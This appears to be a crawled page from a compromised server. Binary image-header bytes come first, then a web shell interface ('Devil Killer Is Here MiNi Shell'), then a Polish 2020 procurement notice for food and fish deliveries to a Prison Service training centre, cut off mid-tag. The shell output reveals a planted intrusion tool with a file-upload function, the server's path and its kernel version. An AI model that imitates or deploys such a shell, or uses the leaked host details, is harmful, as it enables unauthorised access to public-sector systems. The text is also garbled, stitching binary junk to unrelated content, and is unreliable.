JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201119/610346-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 610346-N-2020 z dnia 2020-11-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Centralny Ośrodek Szkolenia Służby Więziennej w Kulach</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawy mrożonek, ryb i konserw rybnych dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach oraz Oddziału Zamiejscowego w Sulejowie w 2021 r.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Centralny Ośrodek Szkolenia Służby Więziennej w Kulach</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00067518100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Kule</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">42-110</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Popów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">034 3104030, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zp_kule@sw.gov.pl , </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">034 3103653</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https:/www.zp.sw.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Ośrodek Szkolenia Służby Więziennej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.zp.sw.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy złożyć w formie pisemnej do siedziby Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Centralny Ośrodek Szkolenia Slużby Więziennej w Kulach, Kule 2, 42-110 Popów, Pokój nr 3 sekretariat pawilon "Liswarta"</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawy mrożonek, ryb i konserw rybnych dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach oraz Oddziału Zamiejscowego w Sulejowie w 2021 r.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">COS-DKW.2232.39.2020.JP</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia, na potrzeby Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach oraz Oddziału Zamiejscowego w Sulejowie są dostawy mrożonek, ryb i konserw rybnych. Zadanie nr 1 - Dostawy mrożonek dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach w 2021 r. 1. Pyzy z mięsem kg 200; 2. Brokuły kg 250; 3. Frytki kg 350; 4. Mieszanka owocowa kg 600; 5 Mieszanka warzywna 7 składnikowa kg 300; 6 Szpinak kg 60; 7 Warzywa na patelnię kg 350; 8 Pierogi z serem kg 250; 9 Pierogi z kapustą i grzybami kg 50; 10 Uszka z mięsem kg 80; 11 Pizza mrożona kg 500; 12 Knedle z owocami kg 200; 13 Kalafior kg 300; 14 Fasolka szparagowa kg 300; 15 Krokiety z mięsem kg 100; 16 Kartacze z mięsem kg 200; 17 Kukurydza mrożona kg 20; 18	Papryka mrożona kg 20; 19 Frytki - kuleczki kg 350; 20 Marchew - mini mrożona kg 350; 21 Bukiet warzyw kwiatowy	kg 350; 22	Ciasto francuskie mrożone kg 100; 23 Brukselka kg 200. Zadanie nr 2 - Dostawy ryb i konserw rybnych dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach w 2021 r. 1 Filet śledziowy a la matias kg 200; 2 Filet z dorsza SHP kg 500; 3 Tuńczyk w oleju kg 100; 4 Kostka rybna panierowana kg 100; 5 Szprot w sosie pomidorowym kg 120; 6 Łosoś wędzony kg 3; 7 Pasta rybna kg 2; 8 Kawior kg 1. Zadanie nr 3 - Dostawy mrożonek dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach Oddział Zamiejscowy Sulejowie w 2021 r. 1 Podgrzybek mrożony kg 100; 2 Maślak mrożony kg	100; 3 Różyczki kalafiorowe mrożone kg 400; 4 Brokuły różyczki mrożone kg 350; 5 Kapusta brukselka mrożona kg 200; 6 Fasolka szparagowa cięta zamrożona kg 220; 7 Marchew typu junior mrożona kg 200; 8 Marchew plastry mrożona kg 200; 9 Marchew kostka mrożona kg 200; 10 Groszek zielony mrożony kg 80; 11 Mieszanka warzywna 7 - składnikowa mrożona kg 120; 12 Mieszanka chińska kg 150; 13 Frytki karbowane kg 280; 14 Mieszanka kompotowa kg 1800. Zadanie nr 4 - Dostawy ryb i konserw rybnych dla Centralnego Ośrodka Szkolenia Służby Więziennej w Kulach Oddział Zamiejscowy Sulejowie w 2021 r. 1 Miruna mrożona kg 350; 2 Morszczuk mrożony kg 350; 3 Śledzie solone matias kg 80; 4 Makrela wędzona tusza b/głowy kg 90; 5 Filet z makreli w pomidorach kg 140; 6 Szprot w oleju kg	140; 7 Paprykarz rybny kg 120; 8 Tuńczyk w oleju kg 80; 9 Paluszki rybne kg 160; 10 Ryba z pieca	kg 280; 11 Śledź po kaszubsku kg 100.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15000000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15896000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15331170-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15311100-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15811300-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15241200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15220000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15240000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15243000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15234000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15244100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15331135-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15331170-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15241400-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15241700-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15242000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określił warunków w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określił warunków w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za spełniających ten warunek Zamawiający uzna wykonawców, którzy wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują dostawy produktów spożywczych w zakresie niezbędnym do wykazania spełniania warunku doświadczenia, przez co zamawiający rozumie realizację w okresie trzech ostatnich lat minimum dwóch dostaw mrożonek, ryb i konserw rybnych w ramach odrębnych umów, których wartości:- dla zadania nr 1 i 3 przekracza wartość 20 000,00 zł brutto; - dla zadania nr 2 i 4 przekracza wartość 15 000,00 zł brutto. Jeżeli okres prowadzenia działalności jest krótszy spełnienie niniejszego warunku powinno nastąpić w tym okresie. Wykonawcy muszą podać Zamawiającemu dane dotyczące zrealizowanych w tym okresie dostaw ze wskazaniem wartość, opisu przedmiotu wykonanej dostawy, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie. Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamowienia wraz z informacją o kwalifikacjach lub doświadczeniu tych osób. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span 